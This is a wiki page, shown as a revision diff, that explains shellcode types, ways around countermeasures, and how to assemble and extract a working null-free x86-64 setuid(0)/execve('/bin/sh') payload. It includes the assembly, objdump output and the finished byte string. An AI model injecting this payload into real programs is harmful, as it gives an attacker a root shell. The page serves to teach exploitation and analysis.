
Difference between revisions of "Category:Shellcode"

From NetSec
Line 1: Line 1:
'''Shellcode''', also known as '''bytecode''', is [[assembly]] which has been translated into properly formatted [[machine code]] ([[binary]] represented in [[hexadecimal]]) for use during [[buffer overflow]] [[exploitation]].  [[Machine code]] can be used by a [[programmer]] to write any application from an [[assembly]] approach because it is just as powerful as any other [[programming language]].
+
'''Shellcode''', also known as '''bytecode''', is [[machine code]] ([[binary]] represented in [[hexadecimal]]) which can be used for [[buffer overflow]] [[exploitation]], and is usually represented to humans in [[assembly]].  [[Machine code]] can be used by a [[programmer]] to write any application from an [[assembly]] approach (as it is just as powerful as any other [[programming language]]), though unlike other languages it is usually ([[#x86.2Fx64_GetCPU_.28any_OS.29|but not always]]) limited to a single [[operating system]] and [[instruction set architecture]]. 
  
:Every [[programming language]] eventually becomes [[binary]], whether at ''compile-time'' or ''runtime''.  When writing a [[Buffer Overflows|buffer overflow]] there are many obstructions from [[SIM|security infrastructure]], such as [[DEP]], [[ASLR]], [[firewall|firewalls]], or [[IDS]] and [[IPS]] appliances, thus many [[filter bypass]] and [[IDS evasion]] techniques (such as [[alphanumeric shellcode]]) must be utilized for successful [[exploitation]] in modern environments in conjunction with [[anti-heuristics]] and [[shellcode obfuscation|obfuscation]] for maximum effectiveness.  There are primarily two types of shellcode: ''executable'' shellcode and ''return-oriented'' shellcode.
+
{{prereq|[[bitwise math]], [[linux assembly]], and [[buffer overflow|stack overflows]]}}
  
 +
== Introduction ==
 +
Every [[programming language]] is eventually expressed in [[binary]], either at ''[[Compiled languages|compile-time]]'' or ''[[Interpreted languages|runtime]]''.  When writing a [[Buffer Overflows|buffer overflow]] there are many potential obstructions from [[SIM|security infrastructures]] (such as [[DEP]], [[ASLR]], [[firewall|firewalls]], or [[IDS]] and [[IPS]] appliances) to keep in mind, as many [[filter bypass]] and [[IDS evasion]] techniques may need to be utilized for successful [[exploitation]] past modern [[countermeasures]].
  
'''Executable shellcode''' is typically translated from [[assembly]] written for its respective target [[Operating System]].
+
This article assumes that the user has access to some form of [[Linux]] or Unix [[bash]] environment with the standard GNU core utilities installed.  In some cases, stub examples can be tested or used using OllyDBG or IDA pro.  Throughout the article are small snippets of code taken from the examples found in [[Shellcode/Appendix|the appendix]]; alternatively, shellcode and associated object files in this article are also contained in [[shellcodecs]].
  
:* Basic executable shellcode, or traditional [[null-free shellcode]] can be used on any vulnerable application (sans filters) with an executable stack.   
+
== Types of shellcode ==
:* 32-bit [[ascii shellcode]] and 64-bit [[alphanumeric shellcode]] are commonly used for filter bypass and IDS evasion.
+
Many different types of shellcode may be utilized depending on the target environment for the execution of the code.  Different types of [[countermeasures]] at different levels of the OSI model require different techniques for successful [[exploitation]] of a given [[application]]'s [[vulnerability]].
  
'''Return oriented shellcode''' utilizes [[Return_Oriented_Programming_(ROP)|return oriented programming]] in cases when the vulnerable buffer is non-executable, bypassing the need for an executable stack.
+
=== Executable vs. Return-oriented ===
 +
There are primarily two types of shellcode from a runtime perspective: ''executable'' shellcode and ''return-oriented'' shellcode. The type required for successful exploitation is dictated by the target environment's ability to execute a data stack.  If properly targeted, return-oriented shellcode should work regardless of the stack's ability to execute, while executable shellcode will work exclusively on executable stacks.
 +
 
 +
 
 +
* '''Executable shellcode''' is typically translated from [[assembly]] written for its respective target [[Operating System]]. Most basic executable shellcodes, or traditional [[null-free shellcode]]s can be used on any vulnerable application ([[unsanitized|sans filters]]) with an executable stack.
 +
 
 +
 
 +
* '''Return oriented shellcode''' utilizes [[Return_Oriented_Programming_(ROP)|return oriented programming]] in cases when the vulnerable buffer is non-executable.  This is usually performed by constructing a [[call stack]] formatted in a similar fashion to that generated by an ordinary [[compiled language|compiled]] [[application]] which then triggers the execution of executable shellcode.  Because the [[call stack]] is treated as data, this bypasses the need for an executable stack during [[exploitation]].
 +
 
 +
 
 +
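{{info|Certain [[instruction set architecture]]s, such as '''MIPS''', keep the [[return address]] of the current function in a link register instead of pushing it onto the stack on every call.  This protects leaf functions from traditional [[buffer overflow|stack overflows]], but functions that call other functions still save the [[return address]] to the stack, so these architectures are not immune to stack overflows or [[Return_Oriented_Programming_(ROP)|return oriented programming]].}}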
 +
 
 +
=== [[Countermeasures]] and environmental hostility ===
 +
While traditional [[binary]] shellcodes will normally work unencumbered for [[unsanitized]], [[unpatched]], or larger [[input]]s, many target environments and applications may have a variety of limiting factors that serve as obstacles to traditional [[machine code]].  Most [[application]]s written in [[C]] or [[C++]] copy input with string functions that stop at the first null byte, so the [[machine code]] must be null-free, which is why [[null-free shellcode]] is the traditional basic form of executable shellcode [[programming]].
 +
 
 +
* Character filters can be evaded by utilizing [[polymorphic]] ([[#Self-modifying code|self-modifying code]]) to reconstruct bytecode outside of the allowed character set during runtime.  Most character filters restrict characters to the printable keyspace, and so [[ascii shellcode]] and [[alphanumeric shellcode]] have become prevalent means of circumventing them.
 +
 
 +
* Character encoding can be bypassed by encoding the payload so that it will decode to the proper [[hexadecimal]] [[machine code]].  Code will often have to survive Unicode, base64, case conversions, or other transformations before being copied into the vulnerable [[buffer]].
 +
 
 +
* [[Buffer]] size may be extremely limited and can require ''second-order injection'' in circumstances in which the payload is too large to fit into the [[vulnerability|vulnerable]] [[buffer]].  As a result, a shellcode's size is traditionally kept to a minimum for optimal re-usability.
 +
 
 +
* [[Firewall]]s can obstruct remote shellcodes by preventing new outbound connections from being formed or preventing new listening sockets from receiving traffic.  [[#Bypassing firewalls|Bypassing firewalls]] has been accomplished by utilizing ''file-descriptor re-use''.
 +
 
 +
* Analysts may be [[debugging]] the vulnerable [[application]] in an attempt to reverse engineer the [[exploitation]] process.  [[int3 breakpoint detection]] and one-way hashing have been demonstrated to evade volatile forensic analysis tools (such as Volatility).
 +
 
 +
* Signatures are a particular problem for [[Linux]] shellcode because syscalls are traditionally used in place of the [[C]] calling convention, which makes them the most static part of any given shellcode with a [[C]] interface.  Even [[polymorphic]] codes usually unpack into shellcodes containing syscalls.  Syscalls can be removed using [[#Runtime_linking_.28syscall_removal.29|self-linking code]].
 +
 
 +
== Shellcode mechanics ==
 +
 
 +
Shellcode is usually written first in [[assembly]] language.  While it is possible for one to memorize an opcode table and write direct [[machine code]] by hand, this is not usually suitable for beginners and therefore is not recommended. 
 +
 
 +
''Environmental factors''
 +
:* Many [[application]]s and [[SIM|security infrastructure]] components will partially [[Sanitize|filter inputs]], restricting the possible instruction set.  Sometimes this will even interfere when overwriting the [[return address]] during exploitation.
 +
 
 +
:* [[Operating system]]s handle the [[C]] [[API]] a bit differently.  Normally ([[Shellcode/Dynamic|but not always]]) shellcode for [[Linux]] relies on kernel interrupts for unlinked calls, while Microsoft Windows does not provide an interrupt API and shellcode must therefore utilize PE parsing to perform its own linking at runtime.
 +
 
 +
=== Assembling the code ===
 +
 
 +
Create a text file named '''test_shellcode.s'''. 
 +
 
 +
This example will use [[User:Hatter|hatter]]'s null-free 34-byte payload for '''setuid(0); execve('/bin/sh',null,null)'''.  Copy the following code into '''test_shellcode.s''', then save it:
 +
{{code|text=<source lang="asm">
 +
.text
 +
.globl _start
 +
_start:
 +
  xor %rdi, %rdi                # Zero out %rdi (first argument)
 +
  push $0x69
 +
  pop %rax                      # Set %rax to function number for setuid()
 +
  syscall                        # setuid(0);
 +
 
 +
 
 +
  push %rdi                     
 +
  push %rdi
 +
  pop %rsi                   
 +
  pop %rdx                      # Null out %rsi and %rdx (second and third argument)
 +
  mov $0x68732f6e69622f6a,%rdi  # move 'hs/nib/j' into %rdi
 +
  shr $0x8,%rdi                  # null truncate the backwards value to '\0hs/nib/'
 +
  push %rdi     
 +
  push %rsp
 +
  pop %rdi                      # %rdi is now a pointer to '/bin/sh\0'
 +
  push $0x3b                   
 +
  pop %rax                      # set %rax to function # for execve()
 +
  syscall                        # execve('/bin/sh',null,null);
 +
</source>}}
 +
 
 +
''When creating shellcode on a [[Linux]] platform, the source file can be assembled using the GNU assembler:''
 +
{{LinuxCMD|as test_shellcode.s -o test_shellcode.o}}
 +
 
 +
=== Extracting the shellcode ===
 +
 
 +
''Once the shellcode has been assembled, it is possible to turn this into bytecode using the [[Linux]] [[binary]] object dumper:''
 +
{{LinuxCMD|objdump -d test_shellcode.o}}
 +
 
 +
The middle column contains the byte instructions corresponding to the [[assembly]] on that line.  Most debuggers also show a [[hexadecimal]] representation corresponding with the assembly of the debugged [[application]], in this case:
 +
 
 +
{{code|text=
 +
user@host:~$ objdump -d test_shellcode.o
 +
 
 +
test_shellcode.o:    file format elf64-x86-64
 +
 
 +
 
 +
Disassembly of section .text:
 +
 
 +
0000000000000000 <_start>:<source lang="asm">
 +
  0: 48 31 ff            xor    %rdi,%rdi
 +
  3: 6a 69                pushq  $0x69
 +
  5: 58                  pop    %rax
 +
  6: 0f 05                syscall
 +
  8: 57                  push  %rdi
 +
  9: 57                  push  %rdi
 +
  a: 5e                  pop    %rsi
 +
  b: 5a                  pop    %rdx
 +
  c: 48 bf 6a 2f 62 69 6e movabs $0x68732f6e69622f6a,%rdi
 +
  13: 2f 73 68
 +
  16: 48 c1 ef 08          shr    $0x8,%rdi
 +
  1a: 57                  push  %rdi
 +
  1b: 54                  push  %rsp
 +
  1c: 5f                  pop    %rdi
 +
  1d: 6a 3b                pushq  $0x3b
 +
  1f: 58                  pop    %rax
 +
  20: 0f 05                syscall
 +
</source>}}
 +
 
 +
The [[hexadecimal]] in the middle column is the bytecode for the executable segment.  To make this into "shellcode", place a ''\x'' prefix before each [[byte]], like so:
 +
::'''\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05'''
 +
 
 +
If desired, it can be turned directly into [[binary]] using [[perl]]'s print statement, "echo -en" in [[bash]], or another [[interpreted languages|interpreted language]].
 +
 
 +
=== Shellcode Disassembly ===
 +
You will often come across shellcode in the wild, for example when analyzing malware or the newest exploit. You may want to disassemble the shellcode to learn what it does; the easiest way to do this is with objdump. In this example we'll use the code we just constructed, the shortest 64-bit setuid() shell online:
 +
 
 +
  ╭─user@host ~ 
 +
  ╰─➤  echo -en "\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05" > shellcode; objdump -b binary -m i386 -M x86-64 -D shellcode
 +
  shellcode:    file format binary
 +
  Disassembly of section .data:
 +
  00000000 <.data>:
 +
    0: 48 31 ff            xor    %rdi,%rdi
 +
    3: 6a 69                pushq  $0x69
 +
    5: 58                  pop    %rax
 +
    6: 0f 05                syscall
 +
    8: 57                  push  %rdi
 +
    9: 57                  push  %rdi
 +
    a: 5e                  pop    %rsi
 +
    b: 5a                  pop    %rdx
 +
    c: 48 bf 6a 2f 62 69 6e movabs $0x68732f6e69622f6a,%rdi
 +
  13: 2f 73 68
 +
  16: 48 c1 ef 08          shr    $0x8,%rdi
 +
  1a: 57                  push  %rdi
 +
  1b: 54                  push  %rsp
 +
  1c: 5f                  pop    %rdi
 +
  1d: 6a 3b                pushq  $0x3b
 +
  1f: 58                  pop    %rax
 +
  20: 0f 05                syscall
 +
  ╭─user@host ~ 
 +
  ╰─➤
  
  
 
{{programming}}{{exploitation}}{{social}}
 
 
<br />
 

Revision as of 04:46, 1 December 2012

Shellcode, also known as bytecode, is machine code (binary represented in hexadecimal) which can be used for buffer overflow exploitation, and is usually represented to humans in assembly. Machine code can be used by a programmer to write any application from an assembly approach (as it is just as powerful as any other programming language), though unlike other languages it is usually (but not always) limited to a single operating system and instruction set architecture.

Shellcode requires a basic understanding of bitwise math, Linux assembly, and stack overflows.


Introduction

Every programming language is eventually expressed in binary, either at compile-time or runtime. When writing a buffer overflow there are many potential obstructions from security infrastructures (such as DEP, ASLR, firewalls, or IDS and IPS appliances) to keep in mind, as many filter bypass and IDS evasion techniques may need to be utilized for successful exploitation past modern countermeasures.

This article assumes that the user has access to some form of Linux or Unix bash environment with the standard GNU core utilities installed. In some cases, stub examples can be tested or used using OllyDBG or IDA pro. Throughout the article are small snippets of code taken from the examples found in the appendix; alternatively, shellcode and associated object files in this article are also contained in shellcodecs.

Types of shellcode

Many different types of shellcode may be utilized depending on the target environment for the execution of the code. Different types of countermeasures at different levels of the OSI model require different techniques for successful exploitation of a given application's vulnerability.

Executable vs. Return-oriented

There are primarily two types of shellcode from a runtime perspective: executable shellcode and return-oriented shellcode. The type required for successful exploitation is dictated by the target environment's ability to execute a data stack. If properly targeted, return-oriented shellcode should work regardless of the stack's ability to execute, while executable shellcode will work exclusively on executable stacks.



  • Return oriented shellcode utilizes return oriented programming in cases when the vulnerable buffer is non-executable. This is usually performed by constructing a call stack formatted in a similar fashion to that generated by an ordinary compiled application which then triggers the execution of executable shellcode. Because the call stack is treated as data, this bypasses the need for an executable stack during exploitation.


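Certain instruction set architectures, such as MIPS, keep the return address of the current function in a link register instead of pushing it onto the stack on every call. This protects leaf functions from traditional stack overflows, but functions that call other functions still save the return address to the stack, so these architectures are not immune to stack overflows or return oriented programming.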

Countermeasures and environmental hostility

While traditional binary shellcodes will normally work unencumbered for unsanitized, unpatched, or larger inputs, many target environments and applications may have a variety of limiting factors that serve as obstacles to traditional machine code. Most applications written in C or C++ copy input with string functions that stop at the first null byte, so the machine code must be null-free, which is why null-free shellcode is the traditional basic form of executable shellcode programming.

  • Character encoding can be bypassed by encoding the payload so that it will decode to the proper hexadecimal machine code. Code will often have to survive Unicode, base64, case conversions, or other transformations before being copied into the vulnerable buffer.
  • Buffer size may be extremely limited and can require second-order injection in circumstances in which the payload is too large to fit into the vulnerable buffer. As a result, a shellcode's size is traditionally kept to a minimum for optimal re-usability.
  • Firewalls can obstruct remote shellcodes by preventing new outbound connections from being formed or preventing new listening sockets from receiving traffic. Bypassing firewalls has been accomplished by utilizing file-descriptor re-use.
  • Signatures are a particular problem for Linux shellcode because syscalls are traditionally used in place of the C calling convention, which makes them the most static part of any given shellcode with a C interface. Even polymorphic codes usually unpack into shellcodes containing syscalls. Syscalls can be removed using self-linking code.
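
The null-free and character-filter constraints described above can be checked mechanically before a payload is used. The following Python sketch is only an illustration: the helper names `is_null_free` and `disallowed_bytes` are hypothetical and not part of shellcodecs, and the bytes are the 34-byte payload built later in this article.

```python
import string

# The 34-byte setuid(0)/execve payload from this article, as raw bytes.
PAYLOAD = bytes.fromhex(
    "4831ff6a69580f05"        # xor, push/pop, syscall (setuid)
    "57575e5a"                # clear %rsi and %rdx
    "48bf6a2f62696e2f7368"    # movabs 'j/bin/sh'
    "48c1ef08"                # shr $8
    "57545f"                  # push string, take pointer
    "6a3b58"                  # push/pop execve number
    "0f05"                    # syscall (execve)
)

# Bytes an alphanumeric-only filter would let through.
ALNUM = (string.ascii_letters + string.digits).encode("ascii")


def is_null_free(code: bytes) -> bool:
    """True if no 0x00 byte would truncate a C string copy."""
    return 0 not in code


def disallowed_bytes(code: bytes, allowed: bytes) -> list:
    """Sorted list of byte values in `code` that a filter would reject."""
    return sorted(set(code) - set(allowed))


if __name__ == "__main__":
    print("length:", len(PAYLOAD))
    print("null-free:", is_null_free(PAYLOAD))
    rejected = disallowed_bytes(PAYLOAD, ALNUM)
    print("rejected by alphanumeric filter:", [hex(b) for b in rejected])
```

The payload passes the null-byte check but not the alphanumeric filter (the `syscall` opcode bytes 0x0f and 0x05 are rejected, among others), which is the situation that alphanumeric or self-modifying shellcode is meant to address.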

Shellcode mechanics

Shellcode is usually written first in assembly language. While it is possible for one to memorize an opcode table and write direct machine code by hand, this is not usually suitable for beginners and therefore is not recommended.

Environmental factors

  • Operating systems handle the C API a bit differently. Normally (but not always) shellcode for Linux relies on kernel interrupts for unlinked calls, while Microsoft Windows does not provide an interrupt API and shellcode must therefore utilize PE parsing to perform its own linking at runtime.

Assembling the code

Create a text file named test_shellcode.s.

This example will use hatter's null-free 34-byte payload for setuid(0); execve('/bin/sh',null,null). Copy the following code into test_shellcode.s, then save it:

 
.text
.globl _start
_start:
  xor %rdi, %rdi                 # Zero out %rdi (first argument)
  push $0x69
  pop %rax                       # Set %rax to function number for setuid()
  syscall                        # setuid(0);
 
 
  push %rdi                      
  push %rdi
  pop %rsi                     
  pop %rdx                       # Null out %rsi and %rdx (second and third argument)
  mov $0x68732f6e69622f6a,%rdi   # move 'hs/nib/j' into %rdi
  shr $0x8,%rdi                  # null truncate the backwards value to '\0hs/nib/'
  push %rdi      
  push %rsp 
  pop %rdi                       # %rdi is now a pointer to '/bin/sh\0'
  push $0x3b                     
  pop %rax                       # set %rax to function # for execve()
  syscall                        # execve('/bin/sh',null,null);
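
The string-building step in the listing above can be checked without running the payload. The following Python sketch is only an illustration (the names `IMM`, `as_assembled` and `on_stack` are made up for this example): it reproduces the `mov`/`shr` arithmetic and shows the bytes that `push %rdi` would place on a little-endian stack. The syscall numbers are the x86-64 Linux values used in the listing.

```python
import struct

# Immediate loaded by `mov $0x68732f6e69622f6a,%rdi` in the listing.
IMM = 0x68732F6E69622F6A

# x86-64 is little-endian, so the immediate is laid out in memory as
# "j/bin/sh". The leading 'j' is a filler byte that keeps the encoded
# instruction free of null bytes.
as_assembled = struct.pack("<Q", IMM)

# `shr $0x8,%rdi` discards the low byte ('j') and shifts a zero into the
# top byte, which becomes the string terminator once the value is pushed.
shifted = IMM >> 8
on_stack = struct.pack("<Q", shifted)

# Syscall numbers placed in %rax by the listing (x86-64 Linux).
SYS_SETUID = 0x69  # 105
SYS_EXECVE = 0x3B  # 59

if __name__ == "__main__":
    print(as_assembled)  # b'j/bin/sh'
    print(on_stack)      # b'/bin/sh\x00'
```

Because the terminating zero is produced by the shift at runtime, no null byte ever appears in the assembled instruction stream.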
 

When creating shellcode on a Linux platform, the source file can be assembled using the GNU assembler:

Terminal

localhost:~ $ as test_shellcode.s -o test_shellcode.o

Extracting the shellcode

Once the shellcode has been assembled, it is possible to turn this into bytecode using the Linux binary object dumper:

Terminal

localhost:~ $ objdump -d test_shellcode.o

The middle column contains the byte instructions corresponding to the assembly on that line. Most debuggers also show a hexadecimal representation corresponding with the assembly of the debugged application, in this case:

user@host:~$ objdump -d test_shellcode.o

test_shellcode.o: file format elf64-x86-64


Disassembly of section .text:

0000000000000000 <_start>:
 
   0:	48 31 ff             	xor    %rdi,%rdi
   3:	6a 69                	pushq  $0x69
   5:	58                   	pop    %rax
   6:	0f 05                	syscall 
   8:	57                   	push   %rdi
   9:	57                   	push   %rdi
   a:	5e                   	pop    %rsi
   b:	5a                   	pop    %rdx
   c:	48 bf 6a 2f 62 69 6e 	movabs $0x68732f6e69622f6a,%rdi
  13:	2f 73 68 
  16:	48 c1 ef 08          	shr    $0x8,%rdi
  1a:	57                   	push   %rdi
  1b:	54                   	push   %rsp
  1c:	5f                   	pop    %rdi
  1d:	6a 3b                	pushq  $0x3b
  1f:	58                   	pop    %rax
  20:	0f 05                	syscall 
 

The hexadecimal in the middle column is the bytecode for the executable segment. To make this into "shellcode", place a \x prefix before each byte, like so:

\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05

If desired, it can be turned directly into binary using perl's print statement, "echo -en" in bash, or another interpreted language.
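
Copying bytes out of the middle column by hand is error-prone. As a sketch only (the function names `extract_bytes` and `to_escaped` are invented here, and the parser assumes objdump's usual tab-separated `offset:<TAB>bytes<TAB>instruction` layout), the extraction could be scripted in Python:

```python
# Disassembly of test_shellcode.o as printed by `objdump -d`, with the
# tab characters written out explicitly.
LISTING = """\
0000000000000000 <_start>:
   0:\t48 31 ff             \txor    %rdi,%rdi
   3:\t6a 69                \tpushq  $0x69
   5:\t58                   \tpop    %rax
   6:\t0f 05                \tsyscall
   8:\t57                   \tpush   %rdi
   9:\t57                   \tpush   %rdi
   a:\t5e                   \tpop    %rsi
   b:\t5a                   \tpop    %rdx
   c:\t48 bf 6a 2f 62 69 6e \tmovabs $0x68732f6e69622f6a,%rdi
  13:\t2f 73 68
  16:\t48 c1 ef 08          \tshr    $0x8,%rdi
  1a:\t57                   \tpush   %rdi
  1b:\t54                   \tpush   %rsp
  1c:\t5f                   \tpop    %rdi
  1d:\t6a 3b                \tpushq  $0x3b
  1f:\t58                   \tpop    %rax
  20:\t0f 05                \tsyscall
"""


def extract_bytes(listing: str) -> bytes:
    """Collect the hex bytes from the middle column of each listing line."""
    code = bytearray()
    for line in listing.splitlines():
        fields = line.split("\t")
        # Skip headers and anything that is not an "offset:<TAB>bytes" line.
        if len(fields) < 2 or not fields[0].strip().endswith(":"):
            continue
        # bytes.fromhex ignores the spaces between and after the hex pairs.
        code += bytes.fromhex(fields[1])
    return bytes(code)


def to_escaped(code: bytes) -> str:
    """Format raw bytes as a \\x-prefixed shellcode string."""
    return "".join(f"\\x{b:02x}" for b in code)


if __name__ == "__main__":
    raw = extract_bytes(LISTING)
    print(len(raw), "bytes")
    print(to_escaped(raw))
```

Calling `to_escaped(extract_bytes(LISTING))` yields the same 34-byte string shown above. Writing the `bytes` object to a file opened in binary mode gives the raw form.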

Shellcode Disassembly

You will often come across shellcode in the wild, for example when analyzing malware or the newest exploit. You may want to disassemble the shellcode to learn what it does; the easiest way to do this is with objdump. In this example we'll use the code we just constructed, the shortest 64-bit setuid() shell online:

 ╭─user@host ~  
 ╰─➤  echo -en "\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05" > shellcode; objdump -b binary -m i386 -M x86-64 -D shellcode
 shellcode:     file format binary
 Disassembly of section .data:
 00000000 <.data>:
   0:	48 31 ff             	xor    %rdi,%rdi
   3:	6a 69                	pushq  $0x69
   5:	58                   	pop    %rax
   6:	0f 05                	syscall 
   8:	57                   	push   %rdi
   9:	57                   	push   %rdi
   a:	5e                   	pop    %rsi
   b:	5a                   	pop    %rdx
   c:	48 bf 6a 2f 62 69 6e 	movabs $0x68732f6e69622f6a,%rdi
  13:	2f 73 68 
  16:	48 c1 ef 08          	shr    $0x8,%rdi
  1a:	57                   	push   %rdi
  1b:	54                   	push   %rsp
  1c:	5f                   	pop    %rdi
  1d:	6a 3b                	pushq  $0x3b
  1f:	58                   	pop    %rax
  20:	0f 05                	syscall 
 ╭─user@host ~  
 ╰─➤

